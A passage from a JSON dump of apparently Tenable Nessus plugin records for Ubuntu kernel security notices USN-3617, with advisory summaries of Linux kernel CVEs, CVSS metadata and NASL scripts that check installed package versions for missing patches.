(CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the\nLinux kernel did not properly validate Generic Segment Offload (GSO)\npacket sizes. An attacker could use this to cause a denial of service\n(interface unavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS)\nimplementation in the Linux kernel contained an out-of-bounds during\nRDMA page allocation. An attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-5332)\n\nMohamed Ghannam discovered a NULL pointer dereference in the RDS\n(Reliable Datagram Sockets) protocol implementation of the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2018-5333)\n\nFan Long Fei discovered that a race condition existed in loop block\ndevice implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-5344).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3617-3/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.13-raspi2 and / or\nlinux-image-raspi2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2020 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 17.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-0861\", \"CVE-2017-15129\", \"CVE-2017-16532\", \"CVE-2017-16537\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\", \"CVE-2017-17450\", \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\", \"CVE-2017-17807\", \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\", \"CVE-2018-5333\", \"CVE-2018-5344\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3617-3\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"17.10\", pkgname:\"linux-image-4.13.0-1016-raspi2\", pkgver:\"4.13.0-1016.17\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"linux-image-raspi2\", pkgver:\"4.13.0.1016.14\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.13-raspi2 / linux-image-raspi2\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:25:04", "description": "It was discovered that a race condition leading to a use-after-free\nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel\nallowed passthrough of the diagnostic I/O port 0x80. An attacker in a\nguest VM could use this to cause a denial of service (system crash) in\nthe host OS. (CVE-2017-1000407)\n\nIt was discovered that a use-after-free vulnerability existed in the\nnetwork namespaces implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the\nLinux kernel did not properly validate endpoint metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the\nLinux kernel did not properly validate device metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB\ndriver in the Linux kernel did not properly validate device\ndescriptors. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in\nthe Linux kernel did not properly handle detach events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the\nLinux kernel did not properly handle suspend and resume events. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did\nnot properly handle holes in hugetlb ranges. A local attacker could\nuse this to expose sensitive information (kernel memory).\n(CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux did not\nproperly restrict access to the connection tracking helpers list. A\nlocal attacker could use this to bypass intended access restrictions.\n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting\n(xt_osf) module did not properly perform access control checks. A\nlocal attacker could improperly modify the system-wide OS fingerprint\nlist. (CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux\nkernel contained an out-of-bounds read when handling memory-mapped\nI/O. A local attacker could use this to expose sensitive information.\n(CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm\nimplementations in the Linux kernel did not properly handle\nzero-length inputs. A local attacker could use this to cause a denial\nof service (system crash). (CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the\nstate of the underlying cryptographic hash algorithm. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel\ndid not properly check permissions when a key request was performed on\na tasks' default keyring. A local attacker could use this to add keys\nto unauthorized keyrings. (CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file\nsystem implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the\nLinux kernel did not properly validate Generic Segment Offload (GSO)\npacket sizes. An attacker could use this to cause a denial of service\n(interface unavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS)\nimplementation in the Linux kernel contained an out-of-bounds during\nRDMA page allocation. An attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-5332)\n\nMohamed Ghannam discovered a NULL pointer dereference in the RDS\n(Reliable Datagram Sockets) protocol implementation of the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2018-5333)\n\nFan Long Fei discovered that a race condition existed in loop block\ndevice implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-5344).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-04T00:00:00", "title": "Ubuntu 17.10 : linux vulnerabilities (USN-3617-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "cpe:/o:canonical:ubuntu_linux:17.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic"], "id": "UBUNTU_USN-3617-1.NASL", "href": "https://www.tenable.com/plugins/nessus/108834", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3617-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108834);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2020/01/23\");\n\n script_cve_id(\"CVE-2017-0861\", \"CVE-2017-1000407\", \"CVE-2017-15129\", \"CVE-2017-16532\", \"CVE-2017-16537\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\", \"CVE-2017-17450\", \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\", \"CVE-2017-17807\", \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\", \"CVE-2018-5333\", \"CVE-2018-5344\");\n script_xref(name:\"USN\", value:\"3617-1\");\n\n script_name(english:\"Ubuntu 17.10 : linux vulnerabilities (USN-3617-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that a race condition leading to a use-after-free\nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel\nallowed passthrough of the diagnostic I/O port 0x80. An attacker in a\nguest VM could use this to cause a denial of service (system crash) in\nthe host OS. (CVE-2017-1000407)\n\nIt was discovered that a use-after-free vulnerability existed in the\nnetwork namespaces implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the\nLinux kernel did not properly validate endpoint metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the\nLinux kernel did not properly validate device metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB\ndriver in the Linux kernel did not properly validate device\ndescriptors. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in\nthe Linux kernel did not properly handle detach events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the\nLinux kernel did not properly handle suspend and resume events. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did\nnot properly handle holes in hugetlb ranges. A local attacker could\nuse this to expose sensitive information (kernel memory).\n(CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux did not\nproperly restrict access to the connection tracking helpers list. A\nlocal attacker could use this to bypass intended access restrictions.\n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting\n(xt_osf) module did not properly perform access control checks. A\nlocal attacker could improperly modify the system-wide OS fingerprint\nlist. (CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux\nkernel contained an out-of-bounds read when handling memory-mapped\nI/O. A local attacker could use this to expose sensitive information.\n(CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm\nimplementations in the Linux kernel did not properly handle\nzero-length inputs. A local attacker could use this to cause a denial\nof service (system crash). (CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the\nstate of the underlying cryptographic hash algorithm. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel\ndid not properly check permissions when a key request was performed on\na tasks' default keyring. A local attacker could use this to add keys\nto unauthorized keyrings. (CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file\nsystem implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the\nLinux kernel did not properly validate Generic Segment Offload (GSO)\npacket sizes. An attacker could use this to cause a denial of service\n(interface unavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS)\nimplementation in the Linux kernel contained an out-of-bounds during\nRDMA page allocation. An attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-5332)\n\nMohamed Ghannam discovered a NULL pointer dereference in the RDS\n(Reliable Datagram Sockets) protocol implementation of the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2018-5333)\n\nFan Long Fei discovered that a race condition existed in loop block\ndevice implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-5344).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3617-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2020 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 17.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-0861\", \"CVE-2017-1000407\", \"CVE-2017-15129\", \"CVE-2017-16532\", \"CVE-2017-16537\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\", \"CVE-2017-17450\", \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\", \"CVE-2017-17807\", \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\", \"CVE-2018-5333\", \"CVE-2018-5344\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3617-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"17.10\", pkgname:\"linux-image-4.13.0-38-generic\", pkgver:\"4.13.0-38.43\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"linux-image-4.13.0-38-generic-lpae\", pkgver:\"4.13.0-38.43\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"linux-image-4.13.0-38-lowlatency\", pkgver:\"4.13.0-38.43\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"linux-image-generic\", pkgver:\"4.13.0.38.41\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.13.0.38.41\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.13.0.38.41\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.13-generic / linux-image-4.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:25:04", "description": "USN-3617-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.10.\nThis update provides the corresponding updates for the Linux Hardware\nEnablement (HWE) kernel from Ubuntu 17.10 for Ubuntu 16.04 LTS.\n\nIt was discovered that a race condition leading to a use-after-free\nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel\nallowed passthrough of the diagnostic I/O port 0x80. An attacker in a\nguest VM could use this to cause a denial of service (system crash) in\nthe host OS. (CVE-2017-1000407)\n\nIt was discovered that a use-after-free vulnerability existed in the\nnetwork namespaces implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the\nLinux kernel did not properly validate endpoint metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the\nLinux kernel did not properly validate device metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB\ndriver in the Linux kernel did not properly validate device\ndescriptors. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in\nthe Linux kernel did not properly handle detach events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the\nLinux kernel did not properly handle suspend and resume events. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did\nnot properly handle holes in hugetlb ranges. A local attacker could\nuse this to expose sensitive information (kernel memory).\n(CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux did not\nproperly restrict access to the connection tracking helpers list. A\nlocal attacker could use this to bypass intended access restrictions.\n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting\n(xt_osf) module did not properly perform access control checks. A\nlocal attacker could improperly modify the system-wide OS fingerprint\nlist. (CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux\nkernel contained an out-of-bounds read when handling memory-mapped\nI/O. A local attacker could use this to expose sensitive information.\n(CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm\nimplementations in the Linux kernel did not properly handle\nzero-length inputs. A local attacker could use this to cause a denial\nof service (system crash). (CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the\nstate of the underlying cryptographic hash algorithm. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel\ndid not properly check permissions when a key request was performed on\na tasks' default keyring. A local attacker could use this to add keys\nto unauthorized keyrings. (CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file\nsystem implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the\nLinux kernel did not properly validate Generic Segment Offload (GSO)\npacket sizes. An attacker could use this to cause a denial of service\n(interface unavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS)\nimplementation in the Linux kernel contained an out-of-bounds during\nRDMA page allocation. An attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-5332)\n\nMohamed Ghannam discovered a NULL pointer dereference in the RDS\n(Reliable Datagram Sockets) protocol implementation of the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2018-5333)\n\nFan Long Fei discovered that a race condition existed in loop block\ndevice implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-5344).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-04T00:00:00", "title": "Ubuntu 16.04 LTS : linux-hwe, linux-gcp, linux-oem vulnerabilities (USN-3617-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-generic", "cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-oem", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-gcp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-oem", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gke"], "id": "UBUNTU_USN-3617-2.NASL", "href": "https://www.tenable.com/plugins/nessus/108835", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3617-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108835);\n script_version(\"1.6\");\n 